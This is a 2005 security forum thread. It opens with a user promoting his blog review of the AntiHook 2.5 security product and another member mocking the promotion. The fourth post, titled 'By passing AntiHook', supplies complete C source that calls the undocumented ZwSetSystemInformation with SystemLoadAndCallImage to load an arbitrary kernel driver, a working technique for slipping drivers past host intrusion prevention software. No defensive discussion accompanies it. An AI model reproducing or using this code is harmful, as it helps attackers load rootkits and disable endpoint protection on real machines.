-
November 8th, 2005, 04:59 PM
#1
Banned
AntiHook 2.5 Review and more
Hi guys,
New Big review for AntiHook 2.5 on my Blog check it out.
http://securityonthenet.blogspot.com/
Next on line BufferZone Home, Safe’n’Sec Personal and PervX home,
Don’t forget the Show down between all Products to declare the best “Painkiller Blog Choose” Award
Cheers
_________________
Painkiller
----------------------------------
Hell yea
-
November 8th, 2005, 08:44 PM
#2
Act now because the first 50 callers will receive one of our "Security for Dummiez" handbooks which you can carry in your backpack.
Cmon dude. This site isn't an infomercial for your blog.
--TH13
Our scars have the power to remind us that our past was real. -- Hannibal Lecter.
Talent is God given. Be humble. Fame is man-given. Be grateful. Conceit is self-given. Be careful. -- John Wooden
-
November 9th, 2005, 07:05 PM
#3
Banned
Dude. it's Google ads, after all it's Goggle Bloger ... what can i do ...
Painkiller
-
November 9th, 2005, 07:25 PM
#4
By passing AntiHook
Loading the driver
#include <windows.h>
#include <stdio.h>
typedef struct _UNICODE_STRING {
USHORT Length;
USHORT MaximumLength;
#ifdef MIDL_PASS [size_is(MaximumLength / 2), length_is((Length) / 2) ] USHORT * Buffer;
#else // MIDL_PASS
PWSTR Buffer;
#endif // MIDL_PASS
} UNICODE_STRING, *PUNICODE_STRING;
typedef long NTSTATUS;
#define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0)
NTSTATUS (__stdcall *ZwSetSystemInformation)(
IN DWORD SystemInformationClass,
IN OUT PVOID SystemInformation,
IN ULONG SystemInformationLength
);
VOID (__stdcall *RtlInitUnicodeString)(
IN OUT PUNICODE_STRING DestinationString,
IN PCWSTR SourceString
);
typedef struct _SYSTEM_LOAD_AND_CALL_IMAGE
{
UNICODE_STRING ModuleName;
} SYSTEM_LOAD_AND_CALL_IMAGE, *PSYSTEM_LOAD_AND_CALL_IMAGE;
#define SystemLoadAndCallImage 38
int main(void)
{
SYSTEM_LOAD_AND_CALL_IMAGE img;
WCHAR daPath[] = L"\\??\\c:\\some.sys";
if( !(RtlInitUnicodeString = (void *)
GetProcAddress( GetModuleHandle("ntdll.dll")
,"RtlInitUnicodeString"
)
)
)
{
exit(1);
}
if(!(ZwSetSystemInformation = (void *)
GetProcAddress(
GetModuleHandle("ntdll.dll")
,"ZwSetSystemInformation"
)
)
)
{
exit(1);
}
RtlInitUnicodeString(
&(img.ModuleName)
,daPath
);
if(
NT_SUCCESS(
ZwSetSystemInformation(
SystemLoadAndCallImage
,&img
,sizeof(SYSTEM_LOAD_AND_CALL_IMAGE)
)
)
)
{
printf("Loaded.\n");
}
else
{
printf("Not loaded.\n");
}
}
Posting Permissions
- You may not post new threads
- You may not post replies
- You may not post attachments
- You may not edit your posts
-
Forum Rules
|
|